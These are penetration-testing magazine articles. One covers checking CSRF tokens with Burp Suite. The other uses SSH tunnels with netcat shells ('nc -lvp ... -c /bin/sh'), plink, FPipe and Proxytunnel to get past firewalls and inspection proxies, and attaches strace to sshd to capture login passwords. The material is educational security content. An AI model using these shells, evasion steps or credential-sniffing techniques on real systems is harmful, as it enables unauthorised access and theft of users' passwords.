In addition to using the different tools in Burp Suite, the objective of this article is to walk you through a step-by-step process of what is actually involved in a web application penetration test. Initially, we started out the discussion by describing how to configure Burp proxy and initiate a vulnerability scan. Automated scanning is an easy way to start the assessment as it gives you coverage on the potential vulnerabilities in an application. We noticed that whenever Burp Scanner identifies a vulnerability, it assigns a rating and confidence level based upon impact. Essentially, our task after this step is to manually verify the findings and investigate those that Burp Scanner doubts, as they may be false positives or they may be clues to a hidden vulnerability. However, in order to properly evaluate an application, we need to devise a testing methodology for every vulnerability we encounter. To get an idea of the various testing methods, we will confine ourselves to a single example of one type of vulnerability in this article since it would go beyond the scope of this expository article to present the testing methods for every web application vulnerability type. We will explore Cross Site Request Forgery (CSRF) as the selected example and explain how to evaluate the proper mitigation OPEN 01/2013
Verifying Cross Site Request Forgery
Figure 16. Entropy Results for Session Cookie
Page 51
http://pentestmag.com
BURP SUITE Figure 17 describes the method for testing the strength of CSRF mitigation techniques. As shown in the flowchart, the first step is to determine whether a webpage needs to be CSRF protected. If the action performed is not something sensitive, for example a search page, it means that the page does not need to be CSRF protected as it does not benefit the attacker. After we have determined that the page in fact needs to be CSRF protected, we check to see if there is something secret to the attacker in the request. This secret can be implemented as a required token embedded as a hidden field parameter, but it can also be a Viewstate parameter, a password or a Captcha. To check whether a CSRF token exists, we can go through the following steps: • Using the Burp proxy tool, we set up the proxy. • We navigate to the form page and fill in the details. • We intercept the form submission using Burp This form submission could be a POST request like the one shown below:
Figure 17. Testing Methodology to Assess CSRF Protection OPEN 01/2013
POST /users/Profile HTTP/1.1 User-Agent:Mozilla/5.0 (Windows NT 5.1; rv:12.0) Gecko/20100101 Firefox/12.0 Accept: text/html, application/xhtml+xml, application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-use, en; q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Cookie: Content-Type: application/x-www-form-urlencoded Content-Length: 119 firstname=user&lastname=name&age=29&sex=F&Randomtok en=xxxxxxxxxx
We notice that the Randomtoken parameter is in the body of the request. It is important to see how the token is implemented. If the token is implemented as a cookie then it does not counter against a CSRF attack because cookies are automatically sent out by the user’s browser whenever the user is tricked into sending a forged request. After checking that the token is implemented correctly, we verify whether the token is used by the web application to process the request. Sometimes developers will introduce CSRF tokens but the server-side logic is missing. To check for this, intercept the POST request using Burp Proxy and remove the Random token parameter. If the server still processes the request it means that the parameter is not being checked. You can also modify the token and see if there are any changes in the behavior of the application. If so, the web application is inspecting for the token. Next, we see whether the token is guessable or not. You can verify this using the Sequencer tool that we described earlier to measure the entropy. Finally, we investigate whether the token is unique per session, per page, or per user. This would determine the strength of the mitigation token. To check whether a token is unique per session, we log in to the application and record the token. Then we log out, clear the session data from the browser, and re-log into the application. If the generated token is different in the second session, then we can infer that it is unique per session after we verify this multiple times. Generally speaking, if the token has passed the entropy tests in Burp Sequencer, it is most likely to be unique per session. We can test if it is unique per page by hitting different pages and viewing the token in the body
Page 52
http://pentestmag.com
of the request. If the token is unique per page and session then it is a considered strong CSRF protection. If it is only unique per session, then its rating is medium. If it is not unique per session, we check to see whether different users will have different tokens. If that is the case, then the token is considered weak because it is fixed.
CSRF Proof-of-Concept Generation
Burp Pro provides a feature that generates Proof of Concept (PoC) HTML pages to show the presence of CSRF. The PoC can be generated from the POST request. To generate the PoC: • Right click on the POST request and go to Engagement tools-> Generate CSRF PoC • The POST request is displayed on the top text box and the corresponding HTML snippet is generated in the bottom text box. Copy the HTML snippet and save it in a file, name the file as an HTML page **.html • To illustrate the concept, log in to the application and double click on the PoC HTML page. • Once the file is opened in your web browser, click on the “Submit” button (Figure 18).
Highlighting Features
The highlighting features of Burp Proxy enables you to color items of HTTP request/responses in the Proxy->History tab which is convenient for viewing and following up with the traces. This can be achieved simply by right-clicking on an item in the History sub-tab and selecting a color in the Highlight option. Personally, I give different colors for different types of requests. For example, I might give login POST request and logout requests a red color, then a green color for requests/responses that are in session, and a different color for requests/responses that are out of session (Figure 19).
Search Features
Burp search features allow you to find specific strings such as cookie names, headers, body messages and parameters through a list of HTTP requests and responses in the History tab. This enables digging into raw request/responses quickly to extract information for pen-testing or troubleshooting. There are many examples
Troubleshooting with Burp
In addition to using Burp Suite to carry out manual pen-tests, Burp can be a great tool to troubleshoot web applications and vulnerability scanners. I have consistently used Burp in the mix with IBM Appscan Standard to fill in some of the details that Appscan misses in its generated requests. Examples of this include defining upstream proxies that process connectivity to applications as well as using the “replace and match” feature to fill in missing credentials. Below I give details on additional features of Burp that help in troubleshooting.
Figure 19. Burp Highlighting Features
Figure 18. Generating Proof-of-Concept CSRF using Burp
Figure 20. Burp Search Feature
OPEN 01/2013
Page 53
http://pentestmag.com
BURP SUITE where this search feature is useful. One example is to check for HTTPOnly and Secure settings on a session cookie, which we can simply look at by searching where the session cookie is set. In the image above, we use the search feature to locate where the ASP.NET_SessionId cookie is set, and we can see that this cookie is set in the response of the second GET request (under the start page /default.aspx). Whenever there is a match for the search string, Burp will highlight in yellow the portion of the request/response where it found that string and will indicate the number of matches in the lower right corner of the GUI (Figure 20).
tasks done. The purpose of this article is to cover features of Burp that I use during my engagements. There are many tutorials on the Internet explaining different features of Burp including the Intruder, Spider, and other tools. These tutorials are wellillustrated with examples and walk-through exercises. However, what I want to emphasize here is how to use these sets of tools as part of your testing process and not just for the sake of what the tool set has in terms of features. Going from configuring proxy and vulnerability scanning to manual assessments and troubleshooting are key components of this process.
Saving the Burp State
From my experience, saving Burp state is not only important for pausing and resuming work on Burp but also for collecting audible artifacts for penetration testing engagements. It is generally considered good practice for pen-testers to record results of raw HTTP request/responses history and scan configurations during the pen-tests. This helps pen-testers and developers to replicate the findings and troubleshoot the application. To save the Burp State, simply go to Burp->Save State. This feature is only available in the Pro version of Burp. Once you click on the “Save State” item, a dialogue box appears which asks you the items that you would like to save their state. Following this dialogue, select the items and save the Burp state file in your file system. To reload Burp state, simply go to Burp->Restore State and point to the file (Figure 21).
Final Remarks
Burp Suite is an enriched set of tools that work together to get your web application penetration
Omar Al Ibrahim
Figure 21. Burp Save State Wizard OPEN 01/2013
Omar Al Ibrahim received his Ph.D. in Computer Science from Southern Methodist University, Dallas, TX, in 2012 and his Master’s degree in Computer Science from Rice University, Houston, TX, in 2007. During his Ph.D. Omar conducted research in embedded security where he developed scalable approaches for resource-constrained embedded environments including low-cost RFID and sensors. Recently, Omar has joined Virtual Security Research (VSR) in Boston, MA, as a security consultant where he conducts web application penetration testing and secure code review. Page 54
http://pentestmag.com
q: how much does Serenity cost?
a: it’s Priceless. Not stillness, not tranquility� but the serenity to do business online, as one should � unmolested. The site is built and launched, it has started making noise on the marketplace. Web servers are gently humming to the tune of orders ringing in, customers chirping, and purposefulness ful�lled. Life is good, not a cloud in the sky � just the daily, most welcome laborious bustle for earned reward, recognition and ever-growing customer satisfaction leading to loyalty and repeat orders. Word of mouth is you�re getting to be one of the best! GO ON, READ THE REST OF THE STORY...
SSH TUNNELS
SSH Tunnels: How to Attack Their Security In this article, we will concentrate our attention on the use of SSH tunnels independent from the protocols we need to use on top of them. We will pay particular attention to how the tunnel works and how it can help us to elude the security controls which have been implemented within the infrastructure we are testing. After that, we will change our point of view and see how to attack SSH.
W
e will exploit the privilege separation feature in order to steal login passwords in the SSH daemon inter-process communication as well as sniff entire user sessions. Secure Shell (SSH) tunnels are very useful tools that every professional penetration tester should master and be able to use at the best of their capabilities. An SSH tunnel consists of an encrypted communication channel created through the use of the SSH protocol and is mainly used in order to encapsulate traffic of other protocols such as Remote Desktop Protocol (RDP), Common Internet File System (CIFS), rsync, etc. in order to benefit from encryption. SSH tunnels are very useful during penetration testing because they enable the bypass of a number of the security measures commonly implemented by systems administrators to harden their infrastructures, such as: network level anti-virus, network and web application firewalls (WAF), intrusion detection systems (IDS), intrusion prevention systems (IPS) and deep packet inspection (DPI) devices.
Used tools and applications
All of the tools and applications used in this article can be installed in any apt or yum based Linux distribution simply by running: OPEN 01/2013
apt-get install tool-name
or yum install tool-name
For each tool used during the article, I suggest to carefully read the entire manual page by using the man command or by looking it up on the Internet. All of the Windows tools we will use are freely distributed by their developers in executable format and can be run from command line from the directory in which they have been downloaded. Netcat basics Netcat is a very useful network tool, as we can read from its man page: it â&#x20AC;&#x153;is a simple Unix utility which reads and writes data across network connections, using TCP or UDP protocolâ&#x20AC;?. This tool permits us to open a socket on the local machine, or to connect to one that is already open. As we said, in the examples provided we will not care about the protocol that will be encapsulated over the tunnel but instead will focus on the tunnel itself. In order to be as generic as possible, we will use Netcat in order to open sockets and establish connections.
Page 56
http://pentestmag.com
nc -lvp <PORT> [-c command]
Opens a socket on localhost on the given port number and executes Netcat in listen mode on that socket nc -vn <IP_ADDRESS> <PORT> [-c command]
Establishes a connection to the given socket. If the -c command argument is passed, Netcat will execute the shell command immediately after the connection establishment, sending its output to the other peer; or if interactive, piping the socket into its standard input and its output to the socket. Netstat basics Netstat is a useful system utility with features that can be used to gain an overall view of open network connections, Unix sockets, routing tables, interface statistics, masquerade connections and multicast memberships on the local machine. During this article, we will use netstat to analyze established connections so that we can better understand why each attack works by having a look at what’s happening under the hood. The syntax varies depending on the platform. In Linux, we will use the command netstat without any argument in order to view information on all open socket connections. Only relevant lines will be reported in the listings. A note on SSH authentication Depending on the scenario, some of the SSH tunneling examples have to be run with password-less authentication in order to work, such as when using DSA/RSA public key authentication. For brev-
ity, the steps needed to implement public key authentication are not described in this article. If you are not familiar with this authentication technique, check the “On the web” paragraph for a link to a short how-to. A note on local security In some examples, we will connect SSH sessions directly from the tested/compromised machine to our workstation by typing the password of the user that logs-in into our machine on the command line of the compromised one. In these cases, I always recommend creating a local unprivileged user account with a chrooted shell environment on our machine. What chroot environments are and how to configure them goes behind the scope of this article and their configuration depends heavily on the operating system we are using. Have a look at the “On the web” paragraph to find a web reference on how to do it on Linux and Google a little in order to adapt it to your workstation’s environment.
Bypassing Security Measures with SSH Tunnels
Firewalls and web application firewalls During a penetration test it could happen to be lucky. That happens, for example, if we find a service that is affected by a vulnerability that can be exploited to permit remote code execution. Let’s suppose that we have successfully exploited such a vulnerability and have a remote shell on the compromised machine. Now, we want to connect to a service that is not reachable from outside such as a database engine or CIFS share.
Figure 1. Remote port forwarding over SSH tunnel OPEN 01/2013
Page 57
http://pentestmag.com
SSH TUNNELS The service could be filtered by both a network firewall and a personal firewall on the host so that only connections from local network (or even only localhost) are accepted. To connect, we can open an SSH tunnel from the compromised machine to our workstation. Suppose that both machines are running Linux and the service that we want to connect to is running on port 1025. We will execute the following command to use remote port forwarding over an SSH tunnel that can be established on the compromised machine: ssh -f -N -R 5555:localhost:1025 <our_ip_address>
When viewed from the remote machine, port 5555 is forwarded on our system through the SSH tunnel to the localhost on port 1025 (option -R 5555:localhost:1025) without executing any remote command after connection establishment (option -N) and putting the SSH process in the background (option -f). We can now access the service on the victim’s machine by connecting to our loopback interface on port 5555. Figure 1 illustrates the connection from our workstation to the remote machine through the SSH tunnel. To complete the example, we can use Netcat to open a socket on the victim machine (port 1025) and
connect to it from our workstation. Listing 1 shows the remote shell on the compromised host (victim), Listing 2 shows the local shell on our workstation (attacker). The IP configuration is 172.23.69.101 (victim) and 172.23.69.102 (attacker). Listing 3 shows the results from the netstat command on the compromised host. We can see that the connection to port 1025 comes from localhost. This means that we have accomplished our goal and eluded both the appliance and the personal firewall. With the same strategy, we can also elude an appliance web application firewall (WAF). Let’s suppose that in the same scenario, a WAF is filtering our attempts to inject SQL statements into a form served by the compromised machine. Encrypting traffic from our workstation to the web server will make impossible for the firewall to inspect our HTTP requests and will result in letting us bypass this checkpoint. To do it, we just have to exchange the 1025 port with the port on which the web server is listening (port 80 for HTTP or 443 for HTTPS). NAT’d or firewalled hosts though compromised machines Another common scenario where using SSH tunnels is helpful during penetration testing is the use
Listing 1. Remote shell from compromised host user@victim:/$ ssh -l attacker -f -N -R 5555:localhost:1025 172.23.69.102 attacker@172.23.69.102’s password: user@victim:/$ nc -lvp 1025 -c /bin/sh listening on [any] 1025 ... connect to [127.0.0.1] from (UNKNOWN) [127.0.0.1] 51519
Listing 2. Connecting to the remote service through the SSH tunnel attacker@attacker:/$ nc -vn 127.0.0.1 5555 (UNKNOWN) [127.0.0.1] 5555 (?) open uname -a Linux 101-victim (…) GNU/Linux
Listing 3. The netstat command executed on the victim machine Proto Recv-Q Send-Q Local Address tcp 0 0 localhost:1025 tcp 0 0 localhost:51519 tcp 0 0 172.23.69.101:35284
OPEN 01/2013
Foreign Address localhost:51519 localhost:1025 172.23.69.102:ssh
Page 58
State ESTABLISHED ESTABLISHED ESTABLISHED
http://pentestmag.com
of a compromised a machine to connect to other machines on the network that are not exposed to the Internet (for example, NAT’d or firewalled hosts). In this example, we will imagine that we have compromised a Microsoft Windows client and have the possibility to run arbitrary code on it with the permissions of the logged-in user. We have installed a sniffer; and through sniffing remote traffic, we have found a server on the same network running services that we may want to connect to, such as CIFS shares or IMAP mail. Since the operating system of the compromised machine is Windows, we will use Plink in order to
establish the SSH tunnel. Plink is one of the PuTTY suite command line tools, a free implementation of Telnet and SSH written by Simon Tatham. If you are new to PuTTY, have a look at the “On the web” paragraph to find a reference to the official page of the project. After downloading the plink.exe executable on the Windows host, we will create an SSH tunnel with remote port forwarding from one port on our workstation to a port on the compromised machine. Next, we will configure the compromised host to forward incoming connections on that port to a port running the daemon we want to connect to. To do that we will use the Fpipe, a free tool developed by McAfee that acts as port redirector on Windows hosts. You can find a reference to the Fpipe home page in the “On the web” paragraph. Let’s suppose the attack machine has an IP address of 10.10.10.10, the compromised machine has 172.16.0.10, the server has 172.16.0.20, and the service is running on port 6666. We can open the tunnel by executing the following command: plink.exe -batch -l <local_user> -pw <password> -R 1234:localhost:5555 <our_ip_address>
Seen from the remote machine, port 1234 on the attack machine is forwarded through the SSH tunnel to localhost (the compromised host) on port 5555 (option -R 1234:localhost:5555), disabling all interactive prompting (option -batch) such as
Figure 2. Port forwarding chain to reach NAT’d server
Listing 4. The output of Netcat command on the three systems Windows Host C:\Users\user>netstat -n | find “ESTABLISHED” TCP 172.16.0.10:49177 10.10.10.10:22 TCP 127.0.0.1:5555 127.0.0.1:49181 TCP 127.0.0.1:49181 127.0.0.1:5555 TCP 172.16.0.10:49182 172.16.0.20:6666 Attack Machine user@attacker$ tcp 0 tcp 0 tcp 0
ESTABLISHED ESTABLISHED ESTABLISHED ESTABLISHED
netstat -n | grep ESTABLISHED 0 10.10.10.10:22 172.16.0.10:49177 0 127.0.0.1:1234 127.0.0.1:44045 0 127.0.0.1:44045 127.0.0.1:1234
Remote Server user@server$ netstat -n | grep ESTABLISHED tcp 0 0 172.16.0.20:6666 172.16.0.10:49182
OPEN 01/2013
Page 59
ESTABLISHED ESTABLISHED ESTABLISHED
ESTABLISHED
http://pentestmag.com
SSH TUNNELS the first key exchange between hosts. The -l and -pw options are used to insert the username and password of a user on the attack machine in order to permit SSH to authenticate. We can now enable port forwarding by executing: FPipe.exe -l 5555 -r 6666 172.16.0.20
This command forwards the local SSH tunnel endpoint port (option -l 5555) to the server (argument 172.16.0.20) on the port on that runs the service we want to c onnect to (option -r 6666). Figure 2 shows how the port forwarding chain works. As in the first example, we can test the connection by executing a Netcat listening command on the compromised server: user@server$ nc -lvp 6666 -c /bin/sh
Next, we connect to it on our local port 1234: user@attacker$ nc -vn 127.0.0.1 1234
To inspect and better understand the internal aspects of the port forwarding chain, we can now use the netstat command on the three systems. Listing 4 shows piping the output to the grep or find command (depending on the system) in order to see the rows of interest. On the Windows host, we can only see four connections: the first is the SSH connection to our workstation used to establish the tunnel (remote port 22), the second and the third are the local connection to port 5555 that represents the endpoint of the established SSH tunnel. The fourth is the
connection to the server created by the Fpipe port redirector (remote port 6666). On the attack machine, we have three connections: the first is the SSH connection opened by the Windows host (local port 22). The second and the third are the local connection to port 1234 that are the endpoint of the established SSH tunnel. On the remote server, only one connection is established on the local port 6666 (the one that comes from our machine through the SSH tunnel and forwarded by the compromised host). We can notice from the remote server’s point of view, that the connection comes from the compromised Windows host (remote IP 172.16.0.10). So, we have reached the NAT’d machine, eluding any appliance or local firewall configuration on the remote network. Proxies and content inspection We began the first paragraph with saying that sometimes luck can help even during a penetration test. However, during previous examples we have probably been a little bit too lucky. First of all, the compromised machines were allowed to traverse the firewall for outbound connections, and secondly there wasn’t any kind of content inspection on the traffic generated from the machine to the Internet and vice versa. To work on a more realistic scenario, let’s now suppose that the system we are testing can only reach the Internet from ports 80 and 443 and it is behind a proxy that acts as content inspection device verifying that the outbound traffic corresponds to the protocol of the port that it is allowing. In this scenario, it wouldn’t be simple to establish the reverse shell after executing remote code on the
Listing 5. Establishing a tunnel through the proxy and encapsulating an SSH tunnel over it victim$ proxytunnel -v -a 1025 -p 172.23.69.102:8080 -d 10.10.10.10:443 victim$ ssh -f -N -q -R 5555:localhost:6666 localhost -p 1025 # Note: RSA public key victim$ nc -lvp 6666 -c /bin/sh # authentication required listening on [any] 6666 ... connect to [127.0.0.1] from localhost [127.0.0.1] 57676
Listing 6. Connecting to the created SSH tunnel from the attacker’s workstation attacker$ nc -vn 127.0.0.1 5555 uname -a Linux 101-victim (…) GNU/Linux
OPEN 01/2013
Page 60
http://pentestmag.com
machine because we need to disguise our traffic to respect the protocol verification requirements of the proxy in order to elude inspection. This can be done by encapsulating our SSH tunnel in an HTTP tunnel. To accomplish this, we can use a tunneling application called Proxytunnel. After downloading and compiling it (the only dependency is OpenSSL), we have to upload it from our machine to the compromised server and execute it. Let’s suppose the victim has IP 172.23.69.101, proxy 172.23.69.102 and we have 10.10.10.10. The proxy is listening on port 8080 and we have configured our SSH daemon to bind to port 443 on our workstation. We have already uploaded Proxytunnel’s executable to the victim workstation. In Listing 5, we establish a tunnel through the proxy (option -p 172.23.69.102:8080) from local port 1025 (option -a 1025) (we could have exploited a service run by an unprivileged user, so we have to choose a port greater than 1024) to our workstation’s port 443 (option -d 10.10.10.10:443). Next, passing through the created tunnel, we establish a new SSH tunnel that forwards port 5555 on our workstation to local port 6666. Finally, we open a Netcat socket on port 6666.
The last line of Listing 5 shows the connection that’s been established from our workstation to the compromised host (Listing 6). Again, we can notice that from the compromised machine’s point of view, the connection comes from localhost. This is because the endpoint of the SSH tunnel is on victim’s localhost (port 6666). Let’s try to better understand what’s happening and how we finally gained the remote shell on the victim’s machine. Listing 7 shows the result of the netstat command on the compromised host. The first netstat line is the connection from the compromised machine to the proxy that establishes the first tunnel (proxy tunnel) opening local port 1025 which forwards to our workstation on port 443 where our SSH daemon is listening. The second and third netstat lines are the SSH tunnel that is encapsulated into the proxy tunnel (connected to localhost on port 1025) which is able to get out of the victim’s network and reach our SSH daemon on port 443 because it is nested into the proxy tunnel that makes it appear to the content filter as a normal SSL over HTTP (read HTTPS) traffic. After being allowed to traverse the
Figure 3. Connections established in order to elude content inspection filters Listing 7. The netstat command result on the compromised machine Active Internet connections (w/o servers) Proto Recv-Q Send-Q Local Address tcp 0 0 172.23.69.101:57808 tcp 0 0 127.0.0.1:58039 tcp 0 0 127.0.0.1:1025 tcp 0 0 127.0.0.1:57676 tcp 0 0 127.0.0.1:6666
OPEN 01/2013
Foreign Address 172.23.69.102:8080 127.0.0.1:1025 127.0.0.1:58039 127.0.0.1:6666 127.0.0.1:57676
Page 61
State ESTABLISHED ESTABLISHED ESTABLISHED ESTABLISHED ESTABLISHED
http://pentestmag.com
SSH TUNNELS content filter, it reaches our machine establishing a second tunnel over the first. The fourth and fifth netstat lines are the connection from our workstation (encapsulated in both the SSH and proxy tunnels) that can reach the compromised machine on port 6666 where Netcat is listening, giving us the remote shell. The question arises spontaneously: Why implement the SSH tunnel? Couldn’t we directly connect to the remote shell over the proxy tunnel without the use of the SSH tunnel, preventing the overhead and complexity given by the double encapsulation model we have used? The answer, as you probably imagine, is no. Or better, since we imagine to be working against an effective content inspection device we suppose that without cryptography, the proxy would be able to decapsulate the nested data stream and detect the protocol (in this case Netcat, but it could have been MySQL, Remote Desktop, etc.) and,
A note on names and definitions
Please note that in reality, least privilege and privilege separation are two different hardening techniques. The “On the web” paragraph provides a web reference which clearly explains the difference. In this article, we will follow the least privilege in terms of privilege separation.
depending on the policy, drop the connection. Encrypting the data stream gave us the opportunity to prevent the inspection device from understanding which protocol we were using. Actually, we misled the device to think we made a common HTTPS connection. Note that the same strategy can also be used to elude network level anti-virus or any other security device that works silently while analyzing the data stream. So, aren’t SSH tunnels cool? If you think so, let’s take a step forward by verifying whether the IT guy agrees with us. Let’s see if he uses SSH to administer his infrastructure or to secure unencrypted protocols. Then we will see if his system is as secure as he thinks.
Changing point of view: Testing SSH connections
Let’s suppose we gained a remote shell on a Linux box and are looking at ps and netstat command output. We notice that SSH is used in order to secure unencrypted connectivity for users to connect to the ERP system and for system administration tasks. Let’s see how to take advantage of this knowledge. Stealing credentials from SSH inter-process communication The second version of SSH is certainly a very strong protocol. At the moment, there isn’t any known tech-
Figure 4. Privilege separation in OpenSSH authentication process OPEN 01/2013
Page 62
http://pentestmag.com
nique to decrypt sniffed traffic or an effective way to perform man-in-the-middle attacks on it. Despite the mere use of SSH, all SSH daemon implementations enforce different security measures in order to harden the application layer design. One of those hardening features is the principle of least privilege, also known as privilege separation. Privilege separation Privilege separation is a programming technique in which software is developed into parts, each of them designed to run compartmentalized, using only the specific privileges required. This programming pattern allows the developer to contain and restrict the effects of programming errors so that a bug in an unprivileged process doesn’t automatically result in a compromise of the entire system. In OpenSSH – as well as in other SSH daemon implementations – privilege separation is on option turned on by default that makes use of un-
privileged processes to authenticate user logins. When a client contacts the main – and privileged – process that listens on port 22, it forks an unprivileged child to handle the authentication process. The child process handles communication with the client and sends the user credentials to the privileged process in order for them to be verified. If the higher-privileged process’ credential verification result is positive, the lower-privileged process state is exported and the main process forks another process granting it the privileges of the authenticated user. Figure 4 shows user authentication in OpenSSH highlighting separation of privileges of every subprocess that takes part of the main process. During the whole authentication process, communication between privileged and unprivileged processes is achieved by pipes so processes substantially share a piece of memory where unencrypted communication occurs. It is exactly that piece of memory that we will steal credentials from during inter-process communication; and, if we
Listing 8. Attaching strace to sshd process to steal authentication credentials owned-server# ps auxww | grep sshd root 267 0.0 0.4 49176 1132 ? Ss 08:33 owned-server# strace -f -e “read” -p 267 2> strace.log
0:00 /usr/sbin/sshd
Listing 9. Portions of traced read events between processes Process 267 Process 396 (…) [pid 396] (…) [pid 396] (…) Process 398 Process 399 (…) [pid 398] [pid 398] [pid 399] (…)
attached - interrupt to quit attached read(6, “\7\0\0\0\6guests”, 11) = 11 <... read resumed> “\v\0\0\0\rare-like-fish”, 18) = 18 attached attached read(10, “Linux owned-server 2.6.32-5-open”..., 16384) = 230 read(11, “# /etc/profile: system-wide .pro”..., 8192) = 823 <... read resumed> “1000\n”, 128) = 5
Listing 10. The authenticated ssh child gains user’s privileges $ ps u 398 USER PID %CPU %MEM guests 398 0.0 0.6
OPEN 01/2013
VSZ 68512
RSS TTY 1760 ?
STAT START S 13:21
Page 63
TIME COMMAND 0:00 sshd: guests@pts/1
http://pentestmag.com
SSH TUNNELS On the web
http://www.debian-administration.org/articles/530 – A brief article on SSH public key authentication with RSA http://allanfeid.com/content/creating-chroot-jail-ssh-access – Creating a Chroot Jail for SSH Access http://www.chiark.greenend.org.uk/~sgtatham/putty – The official PuTTY web page. http://www.mcafee.com/uk/downloads/free-tools/fpipe.aspx – Fpipe port redirector web page http://proxytunnel.sourceforge.net/ – Proxytunnel’s official website http://proxytunnel.sourceforge.net/paper.php – An interesting paper on how proxies work and the way Proxytunnel works to permit any TCP connection to traverse them • http://en.wikipedia.org/wiki/Principle_of_least_privilege – Wikipedia’s description of the principle of least privilege • http://en.wikipedia.org/wiki/Privilege_separation – Wikipedia’s description of privilege separation • http://www.cerias.purdue.edu/site/blog/post/confusion-of-separation-of-privilege-and-least-privilege – Explanation of the difference between privilege separation and least privilege
• • • • • •
want, following SSH process system calls we can sniff the entire user session. Trace processes and intercept communications We will now imagine to have successfully exploited a vulnerability that gave us a remote shell with root privileges (or have gained them with a successful privilege escalation). In order to help executives understand the gravity of the issue, we want to have very impressive test results. We want to track all username-password pairs of users that log in into the system during the day, including root. In order to trace inter-process communication and steal them, we will use strace. Having a look at its man page, we can read that strace “intercepts and records the system calls which are called by a process and the signals which are received by a process”. First of all, we have to install or upload to the system a working strace executable (it only depends from libc); and after checking for the SSH daemon process id, execute strace as shown in Listing 8. In Listing 8, we have attached strace to process id 267 (option -p 267) and to its child (option -f). Since information is gotten from a pipe, we don’t need to have it doubled (write and read events). We can request strace to trace only read events (option -e “read”) and we are redirecting the output (strace sends its output to standard error) to file (2> strace.log). To stop tracing, press Control+C. At a first glance, the syntax of the generated file could seem quite confusing. After a careful read of the man page and a little of experience, you will find it much clearer. Listing 9 shows some of the grabbed communications occurring between process 267, his unprivileged child 396, and the authenticated process 398. Let’s analyze the generated file. As we can see, different processes are attached to strace. In our example, process 396 handles authentication and OPEN 01/2013
we can see that it reads credentials (username: guests, password: are-like-fish). After authentication success, a new child is forked by the main sshd process 398 which gets the authenticated user privileges, as we can see in Listing 10. In Listing 9, we can also see that another process (399) is delegated by the main process to determine the user’s guests user id (uid=1000) immediately after the user is getting on his terminal. An interesting feature of the tracking activity we are doing is that we can intercept and “sniff” the whole user pseudo terminal (PTY) activity, including both inputs and outputs. This feature allows us to steal local passwords (such as those inputted to the su command and logins on remote machines) and also gain the simple visualization of sensitive data in user’s virtual terminal. In addition, we will be able to sniff all of the encapsulated connections as though they were unencrypted if the SSH session is used to establish an SSH tunnel. But let’s go back to our work – we wanted root password, right? Well, it should be quite simple! Let’s stop a couple of services and wait just a few of minutes...
Andrea Zwirner
Page 64
Andrea Zwirner is an Italian IT security consultant. He is the founder of Linkspirit, an Italian company that deals with ethical hacking, security auditing and advising. He strongly believes in Open Source and of late has collaborated with ISECOM and contributes to the Hacker Highschool project. http://pentestmag.com
In the Upcoming Issue of PenTest Open... O P E N
SQL Injection, PCI DSS, BYOD Security and more... Available to download on February 25th
In order to reach PenTest Magazine editorial team, please send your inquiry at en@pentestmag.com. We will reply a.s.a.p. PenTest Magazine reserves a rights to change the content of the next Magazine Edition.